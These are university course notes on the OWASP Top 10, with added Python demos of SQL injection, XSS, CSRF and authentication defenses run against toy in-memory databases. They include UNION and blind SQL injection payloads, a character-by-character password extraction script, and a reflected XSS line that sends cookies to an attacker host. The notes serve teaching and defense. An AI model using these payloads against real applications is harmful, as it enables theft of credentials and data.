Application Security
Chap2- OWASP Top 10 Web Application Vulnerabilities
References
OWASP Top 10 Web App Vulnerabilities.
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
https://www.netsparker.com/blog/web-security
Dr. Nihel Ben Youssef Application Security Chap2- OWASP Top 10 Web Application Vulnerabilities
1 / 37
Application Security - Course Outline
1 OWASP/WASC
3 Injection
Error Based SQL injection
Tautological Injection
UNION SQL Injection
Blind-Based SQL Injection
Boolean-Based SQL Injection
Time-Based SQL Injection
SQL injection Mitigation/Prevention
User Input Validation
Prepared Statements
4 XSS Cross Site Scripting
Reflected XSS
Stored XSS
DOM-Based XSS
XSS Mitigation/Prevention
7 Other vulnerabilities
OWASP/WASC
There are two main non-profit organizations devoted to the creation,
refinement and promotion of Internet security standards. Their projects
include researching, discussing and publishing information about
web application security issues:
WASC (Web Application Security Consortium), founded in 2004 by Jeremiah
Grossman and Robert Auger
OWASP (Open Web Application Security Project), founded in 2001 by Mark
Curphey and Dennis Groves
MITRE is a government-funded organization that publishes standards used by
the information security community:
CWE (Common Weakness Enumeration): a community-developed list of
common software security weaknesses, independent of any particular product
or system. https://cwe.mitre.org/
CVE (Common Vulnerabilities and Exposures): a list of entries, each
containing an identification number, a description and at least one public
reference, for publicly known vulnerabilities in a specific product or
service. https://cve.mitre.org/
CVSS (Common Vulnerability Scoring System): a vendor-agnostic, open
industry standard for conveying the severity of a vulnerability. It is
maintained by FIRST, not by MITRE. http://www.first.org/cvss
OWASP Top 10 Project
The OWASP Top 10 is the de facto awareness standard for web application
security. Its goal is to raise awareness among developers and managers. Since
2003, OWASP has published, at regular intervals, the Ten Most Critical Web
Application Security Risks; the edition used in this chapter is 2017.
Source: https://www.owasp.org/images/7/72/OWASP_Top_10-2017.pdf
Injection
"Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur
when untrusted data is sent to an interpreter as part of a command or
query. The attacker's hostile data can trick the interpreter into executing
unintended commands or accessing data without proper authorization."
(OWASP Top 10 2017, A1:2017-Injection)
Error-Based SQL injection - Tautological Injection (2)
A tautological injection appends a condition that is always true (the classic
' OR '1'='1) to the WHERE clause, so the filter matches every row. In the
example on the slide (not reproduced here), it lets the attacker retrieve
every row of the Cred table, which the application returns as JSON.
Error-Based SQL injection - UNION SQL injection (1)
UNION-based SQL injection extracts information from the database with the
UNION operator. The attacker appends a SELECT statement compatible with the
original query: it must return the same number of columns, with compatible
types, as the original table. The column count is determined beforehand, for
example by trying UNION SELECT NULL, NULL, ... with an increasing number of
NULLs, or with the blind techniques described below. For example, the MySQL
version can be extracted as follows (# starts a MySQL comment, which discards
the rest of the original query):
SELECT * FROM Cred WHERE login='nihel' UNION SELECT NULL, @@version FROM mysql.user #' AND pass=''
Error-Based SQL injection - UNION SQL injection (2)
Using the blind SQL injection techniques described below, the attacker first
gathers the number of columns in the original query and their data types.
Knowing the structure of the original table and the MySQL version (5.7.25
here), the attacker can then extract every MySQL account (user name and
password hash) from the system table mysql.user, whose password column is
named authentication_string from MySQL 5.7 onwards. Reading mysql.user only
works if the application's database account has been granted SELECT on the
mysql schema, which is itself a least-privilege failure worth checking for:
SELECT * FROM Cred WHERE login='nihel' UNION SELECT user, authentication_string FROM mysql.user #' AND pass=''
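Added example (written for these notes, not part of the original slides): the tautological injection of the previous slide and the UNION injections of this one, run against a deliberately vulnerable lookup. An in-memory SQLite table named Cred with two made-up rows stands in for the MySQL database; sqlite_version() and the sqlite_master catalog play the roles of @@version and mysql.user, and the trailing comment is written "-- " because SQLite does not accept MySQL's "#". The function and value names are illustrative.

```python
import sqlite3

# Constructed demo database: an in-memory SQLite stand-in for the slides'
# MySQL Cred(login, pass) table. Payloads end with "-- " (SQLite comment);
# in MySQL the same attacks use "#" as shown on the slides.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Cred (login TEXT, pass TEXT)")
    conn.executemany("INSERT INTO Cred VALUES (?, ?)",
                     [("nihel", "s3cret"), ("admin", "hunter2")])
    return conn

def vulnerable_lookup(conn, login, pw):
    # The anti-pattern: untrusted input concatenated into the query text.
    query = ("SELECT login, pass FROM Cred "
             f"WHERE login='{login}' AND pass='{pw}'")
    return conn.execute(query).fetchall()

def tautology_attack(conn):
    # "' OR 1=1 -- " makes the WHERE clause always true and comments out
    # the password check, so every row comes back.
    return vulnerable_lookup(conn, "' OR 1=1 -- ", "anything")

def tautology_precedence_trap(conn):
    # The textbook "' OR '1'='1" in the login field alone does NOT dump the
    # table: AND binds tighter than OR, so the clause parses as
    #   login='' OR ('1'='1' AND pass='anything')
    # and still needs the password. Injecting it in both fields does work.
    only_login = vulnerable_lookup(conn, "' OR '1'='1", "anything")
    both_fields = vulnerable_lookup(conn, "' OR '1'='1", "' OR '1'='1")
    return len(only_login), len(both_fields)

def union_version(conn):
    # UNION needs the same column count as the original SELECT (two here);
    # NULL pads the column we do not care about. sqlite_version() is the
    # SQLite counterpart of MySQL's @@version.
    rows = vulnerable_lookup(
        conn, "' UNION SELECT NULL, sqlite_version() -- ", "")
    return rows[0][1]

def union_schema(conn):
    # Reading another table through the same hole: sqlite_master lists every
    # table with its CREATE statement, the analogue of the slides'
    # "SELECT user, authentication_string FROM mysql.user".
    rows = vulnerable_lookup(
        conn, "' UNION SELECT name, sql FROM sqlite_master -- ", "")
    return {name: sql for name, sql in rows}

if __name__ == "__main__":
    db = make_db()
    print("tautology:", tautology_attack(db))
    print("precedence trap (login only, both fields):",
          tautology_precedence_trap(db))
    print("version via UNION:", union_version(db))
    print("schema via UNION:", union_schema(db))
```

The precedence trap is worth remembering when testing: a payload that "does not work" in one field may simply be losing to operator precedence rather than being filtered.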
Blind SQL injection - Time-Based SQL Injection (1)
Time-based SQL injection is a type of blind SQL injection: the page itself
shows no difference, and the attacker infers information from how long the
database takes to return a result.
For example, an attacker can guess a value one character at a time with a
conditional delay: if the first letter of the login value is "n"
(ASCII 110), sleep for 10 seconds (MySQL: SLEEP(10)); otherwise return at once.
Blind SQL injection - Time-Based SQL Injection (2)
As a second example, the attacker can guess the version of the DBMS
(Database Management System): if the version string starts with 5, sleep for
10 seconds.
Blind SQL injection - Boolean-Based SQL Injection (2)
In boolean-based blind injection the attacker injects a condition and observes
whether the page behaves as for a true or a false condition (for instance, a
row is returned or not); each request answers one yes/no question about the
data, so a value is recovered bit by bit rather than read directly.
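Added example (written for these notes, not part of the original slides) covering both blind techniques of the preceding slides: a boolean oracle that recovers a password character by character, and a time-based oracle that probes the first digit of the DBMS version. The database is an in-memory SQLite table named Cred with two made-up rows; SQLite has no SLEEP(), so a Python function is registered under that name to stand in for MySQL's SLEEP(), and sqlite_version() replaces @@version. The 0.2 s delay and all names are choices made for this demo.

```python
import sqlite3
import time

# Constructed demo database: an in-memory SQLite stand-in for the slides'
# MySQL Cred(login, pass) table. SQLite has no SLEEP(), so a Python function
# is registered under that name to play the role of MySQL's SLEEP().
# Trailing comments use "-- " because SQLite does not know MySQL's "#".
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Cred (login TEXT, pass TEXT)")
    conn.executemany("INSERT INTO Cred VALUES (?, ?)",
                     [("nihel", "s3cret"), ("admin", "hunter2")])
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn

def vulnerable_lookup(conn, login, pw):
    # The injectable query: user input concatenated into the SQL text.
    query = f"SELECT login FROM Cred WHERE login='{login}' AND pass='{pw}'"
    return conn.execute(query).fetchall()

def boolean_oracle(conn, condition):
    # Boolean-based blind: the application only reveals whether a row matched.
    # The condition is ANDed to a known-good login and the real password
    # check is commented out, so "row returned" means "condition true".
    rows = vulnerable_lookup(conn, f"nihel' AND ({condition}) -- ", "")
    return len(rows) > 0

def extract_password(conn, max_len=64):
    # Recovers nihel's password one character at a time. Each character is
    # found by binary search over printable ASCII (32..126): about 7 yes/no
    # questions per character instead of one question per candidate letter.
    recovered = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(conn, f"length(pass) >= {pos}"):
            break                       # no more characters
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if boolean_oracle(conn, f"unicode(substr(pass, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered

def time_oracle(conn, condition, delay=0.2):
    # Time-based blind: the response looks identical either way; the only
    # signal is that SLEEP() runs when the condition holds. The slides use
    # 10 s; 0.2 s keeps the demo fast.
    payload = f"nihel' AND CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END -- "
    start = time.monotonic()
    vulnerable_lookup(conn, payload, "")
    return time.monotonic() - start >= delay / 2

def version_major_via_timing(conn):
    # The slides' second example ("if the version starts with 5, sleep"),
    # asked of sqlite_version() instead of MySQL's @@version. Returns the
    # leading digit, or None if none of 1..9 triggered the delay.
    for digit in range(1, 10):
        if time_oracle(conn, f"substr(sqlite_version(), 1, 1) = '{digit}'"):
            return str(digit)
    return None

if __name__ == "__main__":
    db = make_db()
    print("password:", extract_password(db))
    print("version major digit:", version_major_via_timing(db))
```

The binary search is what makes blind extraction practical: with 95 printable characters a linear guess costs up to 95 requests per character, the search about 7. Against a real server the time oracle also needs a threshold well above network jitter, which is why real tools repeat measurements.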
SQL injection Mitigation/Prevention (1)
Many practices (allow-list and deny-list approaches) can be used to prevent
SQL injection. Among them:
Input Validation: validating the user's input from an HTML form against what
the field is allowed to contain (an allow-list). Deny-lists of "bad"
characters are easy to bypass and should not be relied on.
Input Filtering: check and sanitize user input. For example, phone numbers
should be filtered to allow only the digits allowed in a phone number. For
this, we can use the functions and libraries offered by the development
framework: in PHP, filter_var from the filter extension, and so on. We can
also use regular expressions to match patterns in string data; in PHP,
preg_match.
Input Escaping: ensuring that dangerous characters such as ' are not passed
unchanged to the SQL statement. Escaping consists of prepending a backslash to
special characters. Examples of PHP functions: addslashes and
mysql_real_escape_string (mysql_escape_string was deprecated long ago and the
whole mysql_* extension was removed in PHP 7; magic quotes were removed in
PHP 5.4). Escaping only protects quoted string contexts: a value inserted
into a numeric position (WHERE id = 1 OR 1=1) contains nothing to escape.
Prepared Statements: the query text is sent to the database first and the
user-supplied values are bound to it separately (in PHP: PDO prepare/execute
or mysqli prepared statements), so data can never change the structure of
the query. This is the primary defense; validation and escaping are
defense in depth.
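Added example (written for these notes, not part of the original slides): the three mitigations of this slide side by side, against the same in-memory SQLite table named Cred used in the earlier examples. safe_lookup uses a parameterized query (the prepared-statement idea), is_valid_phone is allow-list validation in the spirit of preg_match, and addslashes is a simplified Python re-implementation of PHP's addslashes used only to show where escaping fails. All names and sample rows are made up for the demo.

```python
import re
import sqlite3

# Constructed demo database: the slides' Cred(login, pass) table in SQLite.
# rowid is SQLite's implicit integer key and stands in for a numeric id.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Cred (login TEXT, pass TEXT)")
    conn.executemany("INSERT INTO Cred VALUES (?, ?)",
                     [("nihel", "s3cret"), ("admin", "hunter2")])
    return conn

def safe_lookup(conn, login, pw):
    # Prepared (parameterized) statement: the SQL text is fixed and the values
    # are bound separately, so a quote in the data is just a character and the
    # tautology payload from the earlier slides matches nothing.
    return conn.execute(
        "SELECT login FROM Cred WHERE login = ? AND pass = ?", (login, pw)
    ).fetchall()

PHONE_RE = re.compile(r"\+?[0-9]{8,15}")

def is_valid_phone(value):
    # Allow-list validation: accept only an optional "+" and 8 to 15 digits,
    # reject everything else. fullmatch anchors both ends of the string.
    return PHONE_RE.fullmatch(value) is not None

def addslashes(value):
    # Simplified Python version of PHP's addslashes(): backslash before
    # single quote, double quote and backslash.
    return re.sub(r"([\\'\"])", r"\\\1", value)

def escaped_numeric_lookup(conn, user_id):
    # Escaping only helps inside quoted strings. In an unquoted numeric
    # position the payload "1 OR 1=1" has nothing to escape, so the
    # "protected" query still becomes a tautology and returns every row.
    query = f"SELECT login FROM Cred WHERE rowid = {addslashes(user_id)}"
    return conn.execute(query).fetchall()

def safe_numeric_lookup(conn, user_id):
    # Validate the type (allow-list) and bind the value as a parameter.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT login FROM Cred WHERE rowid = ?", (uid,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(safe_lookup(db, "' OR 1=1 -- ", "x"))        # []
    print(safe_lookup(db, "nihel", "s3cret"))          # [('nihel',)]
    print(is_valid_phone("+21612345678"), is_valid_phone("1; DROP TABLE Cred"))
    print(escaped_numeric_lookup(db, "1 OR 1=1"))      # both rows: escaping failed
    print(safe_numeric_lookup(db, "1 OR 1=1"))         # []
```

The numeric case is the one that catches teams who believe escaping is enough: the escaping function did exactly what it promises, and the query was still injectable because the context was not a quoted string.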
XSS Cross Site Scripting
XSS is a web vulnerability that lets an attacker run script in the context of
another site's origin, which defeats the protection of the SOP (Same Origin
Policy). SOP is among the most important security principles in every web
browser: it forbids a document from reading content of a different origin.
For example, the page https://www.banque.com/index.html can access
content from https://www.banque.com/about.html, while
https://www.attacker.com/info.php must not access content from
https://www.banque.com/about.html. Script injected into a banque.com page,
however, runs as https://www.banque.com and can read that site's DOM and
cookies.
There are three main classes of XSS:
Reflected XSS: happens when user input from the request (a URL parameter or
POST field, for instance) is echoed into the response page without being
stored. The attacker sends a crafted link to the victim carrying a payload
that, for example, reads the user's current cookie and redirects to a website
controlled by the attacker.
Stored XSS: happens when the malicious payload is saved (database,
filesystem, ...) and then executed when a user opens the page. For example,
the attacker could place a payload in a forum or social media website
vulnerable to stored XSS; the payload runs each time a victim opens it.
DOM-Based XSS: the payload never appears in the server's HTML; the page's own
client-side JavaScript reads it from the DOM (for example from location.hash)
and writes it into the page.
Reflected XSS
<script>document.location='http://www.attacker.com/hackerget.php?cook='
+ encodeURIComponent(document.cookie)</script>
Stored XSS
DOM-Based XSS
One of the biggest differences between DOM-based XSS and reflected or stored
XSS is that DOM-based XSS cannot be stopped by server-side filters. The reason
is that the payload is generally written after the "#" (hash) of the URL: the
fragment is never sent to the server, so the server cannot inspect it and it
never appears in the response page. The vulnerable code is the page's own
JavaScript, which reads location.hash (or another DOM source) and passes it to
a sink such as document.write or innerHTML.
Modern browsers (Firefox from version 40 or above, Opera, Safari and Google
Chrome) expose location.hash percent-encoded, so a naive payload containing
"<" is not interpreted as markup when written to the page. This is a side
effect of encoding, not a fix for DOM-based XSS. In the example below, the
page calls unescape() explicitly to decode the fragment and bypass that
behaviour in Firefox, so that the attack executes.
XSS Mitigation/Prevention (1)
Many practices can be used to prevent XSS. Among them:
Sanitization: clean up the user's input by removing irrelevant or dangerous
characters. For example, the PHP function strip_tags turns
<script>alert('hi name')</script> into alert('hi name'). Sanitization is a
deny-list technique: it only covers the cases it anticipates (tags nested to
survive one pass, event-handler attributes, javascript: URLs), so it must
never be the only defense.
Output Encoding: convert untrusted data, at the moment it is written into the
page, into a form where the browser displays it as data instead of executing
it as code. For an HTML text context the PHP function htmlspecialchars is
recommended; pass ENT_QUOTES so that single quotes are encoded too (this is
the default only from PHP 8.1), and use the encoding that matches the
context (attribute, JavaScript string, URL) rather than one encoder for
everything.
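Added example (written for these notes, not part of the original slides): the reflected XSS of the earlier slide rendered three ways, to show why sanitization by stripping tags is weaker than output encoding. html.escape(value, quote=True) is the Python counterpart of htmlspecialchars($value, ENT_QUOTES); naive_sanitize is a deliberately simple one-pass tag stripper written for this demo, not PHP's strip_tags. The attacker inputs are constructed.

```python
import html
import re

# Constructed attacker inputs for a "name" parameter reflected into the page.
BASIC_PAYLOAD = "<script>alert('hi name')</script>"
NESTED_PAYLOAD = "<scr<script>ipt>alert(1)</scr<script>ipt>"
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(document.cookie)'

SCRIPT_TAG_RE = re.compile(r"</?script[^>]*>", re.IGNORECASE)

def naive_sanitize(value):
    # Deny-list sanitization: remove <script> tags in a single pass. The
    # nested payload is built so that removing the inner tag leaves a new,
    # intact <script> behind.
    return SCRIPT_TAG_RE.sub("", value)

def render_vulnerable(name):
    # Reflected XSS: the parameter is echoed into the HTML unchanged.
    return f"<p>Hello {name}</p>"

def render_sanitized(name):
    return f"<p>Hello {naive_sanitize(name)}</p>"

def render_encoded(name):
    # Output encoding for an HTML text context: < > & " ' become entities,
    # so whatever the input was, the browser shows it as text.
    return f"<p>Hello {html.escape(name, quote=True)}</p>"

def render_attribute_vulnerable(name):
    # Attribute context without encoding: a double quote in the input closes
    # the value and the rest of the payload becomes a new attribute.
    return f'<input name="who" value="{name}">'

def render_attribute_encoded(name):
    # Attribute context done right: quoted AND encoded. Quotes without
    # encoding, or encoding without quotes, are both still injectable.
    return f'<input name="who" value="{html.escape(name, quote=True)}">'

if __name__ == "__main__":
    print(render_vulnerable(BASIC_PAYLOAD))
    print(render_sanitized(BASIC_PAYLOAD))        # the strip_tags-like result
    print(render_sanitized(NESTED_PAYLOAD))       # bypass: <script> survives
    print(render_encoded(NESTED_PAYLOAD))         # inert text
    print(render_attribute_vulnerable(ATTRIBUTE_PAYLOAD))
    print(render_attribute_encoded(ATTRIBUTE_PAYLOAD))
```

The rule this illustrates: sanitize input if you must, but always encode on output for the exact context the data lands in. A value that is safe in element text is not automatically safe inside an attribute, a script block or a URL.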
XSS Mitigation/Prevention(2)
CSRF Cross Site Request Forgery
CSRF, also known as Sea Surf, is an attack that forces an end user to
execute unwanted actions on a web application in which they are currently
authenticated (www.bank.tn). Generally using social engineering (such as
sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker's choosing (transferring
funds, changing their email address, etc.). The browser attaches the victim's
session cookie to the forged request automatically, which is why the
application cannot distinguish it from a legitimate request without an extra
check. If the victim is an administrative account, CSRF can compromise the
entire web application.
CSRF Cross Site Request Forgery
This figure (not reproduced here) illustrates the CSRF scenario.
CSRF Codes (HTML/PHP pages)
CSRF Mitigation (HTML/PHP pages)
(Figures: successful attack; cookie stored in the victim's browser.)
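Added example (written for these notes, not part of the original slides or their HTML/PHP pages): the CSRF scenario and its mitigation modelled in Python. The bank site www.bank.tn from the slides is kept; the session store, the transfer handler and the request dictionaries are a constructed model of what the real HTML/PHP pages would read from HTTP, and the names are illustrative. The defense is the synchronizer token pattern plus an Origin header check.

```python
import hmac
import secrets

# Constructed model of the CSRF scenario: the bank site, a logged-in victim,
# and an attacker page that makes the victim's browser submit a transfer.
# Requests are plain dicts with the fields a real handler would read.
SITE_ORIGIN = "https://www.bank.tn"
SESSIONS = {}   # session id -> {"user": ..., "csrf_token": ...}
LEDGER = []     # transfers that were actually executed

def login(user):
    # The session id goes into a cookie. The per-session synchronizer token is
    # embedded only in the server's own forms; an attacker page cannot read it
    # because the same-origin policy blocks cross-origin reads.
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid

def render_transfer_form(sid):
    # The legitimate form carries the token as a hidden field.
    token = SESSIONS[sid]["csrf_token"]
    return (f'<form method="POST" action="{SITE_ORIGIN}/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')

def handle_transfer(request):
    # request = {"cookies": {...}, "headers": {...}, "form": {...}}
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return 401, "not authenticated"
    # Defense 1: Origin check. Browsers add Origin to cross-site POSTs and
    # page script cannot forge it; a missing header is tolerated here for
    # non-browser clients, the token check below still applies.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site request rejected"
    # Defense 2: synchronizer token, compared in constant time.
    supplied = request["form"].get("csrf_token", "")
    expected = session["csrf_token"]
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    LEDGER.append((session["user"], request["form"]["to"],
                   request["form"]["amount"]))
    return 200, "transfer executed"

def legitimate_request(sid):
    # Submitted from the bank's own form: token present, same origin.
    token = SESSIONS[sid]["csrf_token"]
    return {"cookies": {"sid": sid},
            "headers": {"Origin": SITE_ORIGIN},
            "form": {"to": "friend", "amount": "10", "csrf_token": token}}

def forged_request(sid):
    # What the attacker's page can produce: the browser adds the victim's
    # cookie automatically, but the form fields are the attacker's and the
    # browser sets Origin to the attacker's site.
    return {"cookies": {"sid": sid},
            "headers": {"Origin": "https://www.attacker.com"},
            "form": {"to": "attacker", "amount": "1000"}}

if __name__ == "__main__":
    sid = login("victim")
    print(render_transfer_form(sid))
    print(handle_transfer(legitimate_request(sid)))   # (200, ...)
    print(handle_transfer(forged_request(sid)))       # (403, ...)
    print(LEDGER)
```

Setting the session cookie with the SameSite attribute (Lax or Strict) adds a third, browser-enforced layer: the cookie is then not attached to cross-site POSTs at all. It does not replace the token, because older clients and some navigation cases are not covered.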
Broken Authentication and Session Management vulnerability
Authentication General Guidelines(1)
Authentication General Guidelines(2)
Authentication General Guidelines(3)
Authentication General Guidelines(4)
Authentication and Error Messages A web application should
respond in a generic manner. In Authentication phase, incorrect error
messages can be used for the purposes of user ID and password
enumeration. For example, "Login for User Nihel: invalid password"
should be replaced by "Login failed; Invalid userID or password"
Re-authentication for Sensitive Features Using active sessions, an
attacker may be able to execute sensitive transactions through a CSRF
or XSS attack without needing the user’s current credentials. It is
recommended to require another authentication page before updating
sensitive account information.
Enable logging and monitoring of authentication functions In
order to detect attacks / failures on a real time basis, all password and
account failures should be logged and reviewed.
Prevent Brute Force Attacks Password lockout mechanisms. If
more than a predefined number of unsuccessful login attempts are
made, the account shoud be lock out.
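Added example (written for these notes, not part of the original slides): a login function that applies the guidelines above, namely a single generic failure message, equal work for unknown and known users, an audit log of every authentication event, and a temporary lockout after repeated failures. The user store, the thresholds (5 attempts, 15 minutes) and the PBKDF2 parameters are choices made for this demo; "now" is passed in so the lockout window can be exercised without waiting.

```python
import hashlib
import hmac
import os
import time

# Constructed user store and policy values; all illustrative.
GENERIC_FAILURE = "Login failed; invalid user ID or password"
MAX_FAILURES = 5            # failed attempts before lockout
LOCKOUT_SECONDS = 15 * 60   # temporary, not permanent
PBKDF2_ITERATIONS = 100_000

USERS = {}      # user -> {"salt", "hash", "failures", "locked_until"}
AUDIT_LOG = []  # (timestamp, event, user): what monitoring would ingest

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                               PBKDF2_ITERATIONS)

def register(user, password):
    salt = os.urandom(16)
    USERS[user] = {"salt": salt, "hash": _hash(password, salt),
                   "failures": 0, "locked_until": 0.0}

def login(user, password, now=None):
    # Returns (success, message). Every failure path yields the same generic
    # message, so the response cannot be used to enumerate valid user IDs.
    now = time.time() if now is None else now
    record = USERS.get(user)
    if record is None:
        # Burn the same hashing cost as a real check so that response time
        # does not reveal whether the user exists.
        _hash(password, b"\x00" * 16)
        AUDIT_LOG.append((now, "login_failed_unknown_user", user))
        return False, GENERIC_FAILURE
    if now < record["locked_until"]:
        # Even the correct password is refused while the lockout lasts.
        AUDIT_LOG.append((now, "login_rejected_locked", user))
        return False, GENERIC_FAILURE
    if hmac.compare_digest(_hash(password, record["salt"]), record["hash"]):
        record["failures"] = 0
        AUDIT_LOG.append((now, "login_success", user))
        return True, "Welcome"
    record["failures"] += 1
    AUDIT_LOG.append((now, "login_failed_bad_password", user))
    if record["failures"] >= MAX_FAILURES:
        record["locked_until"] = now + LOCKOUT_SECONDS
        record["failures"] = 0
        AUDIT_LOG.append((now, "account_locked", user))
    return False, GENERIC_FAILURE

if __name__ == "__main__":
    register("nihel", "correct horse")
    for _ in range(MAX_FAILURES):
        print(login("nihel", "wrong", now=1000.0))
    print(login("nihel", "correct horse", now=1001.0))   # still locked
    print(login("nihel", "correct horse", now=1001.0 + LOCKOUT_SECONDS))
    for entry in AUDIT_LOG:
        print(entry)
```

The audit log is the part most often skipped: the lockout only protects one account, while the log is what lets monitoring notice one source address failing against many accounts (password spraying), which per-account counters never see.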
Authentication General Guidelines(5)
Session Management Vulnerability
Session Management Guidelines(1)
Session Management Guidelines(2)
Other Vulnerabilities in OWASP TOP 10
(https://www.owasp.org/index.php/Top_10-2017_Top_10)
Sensitive Data Exposure: a web application or API may not protect sensitive
data (passwords, credit card numbers, PII). Collecting and processing such data
must respect privacy laws, e.g. the EU's General Data Protection Regulation
(GDPR). Attackers may use exposed data to conduct credit card fraud, identity
theft or other crimes. So data should be classified and controlled, sensitive
data encrypted in transit and at rest, algorithms and protocols kept up to
date, secure key management used, and data that is not needed not stored at
all.
Broken Access Control: a web application may not enforce access controls.
Attackers can then act outside of their intended permissions, which leads to
unauthorized information disclosure, modification or destruction of data, or
performing a business function outside the limits of the user. So we should
deny access to non-public resources by default, enforce record ownership on
the server for every request (never trust a client-supplied identifier),
disable web server directory listing, and log access control failures.
Other Vulnerabilities in OWASP TOP 10
(https://www.owasp.org/index.php/Top_10-2017_Top_10)
Security Misconfiguration: usually caused by insecure default configurations
(OS, frameworks, applications, libraries), incomplete configurations,
misconfigured HTTP headers, and verbose error messages containing sensitive
information. All components must be patched and upgraded in a timely fashion.
So we should provide a repeatable hardening process and a management process
that includes reviewing and updating the configurations in response to all
security notes, updates and patches.
Insufficient Logging and Monitoring: if logins, failed logins, suspicious
activity, threshold violations and high-value transactions are not logged, the
application is unable to detect, escalate or alert on active attacks in real
time or near real time. Most breach studies show that the time to detect a
breach is over 200 days, and that breaches are typically detected by external
parties rather than by internal processes or monitoring. So it is recommended
to establish effective logging, monitoring and alerting, such that suspicious
activities are detected and responded to in a timely fashion, and to adopt an
incident response and recovery plan such as NIST SP 800-61 rev 2 or later.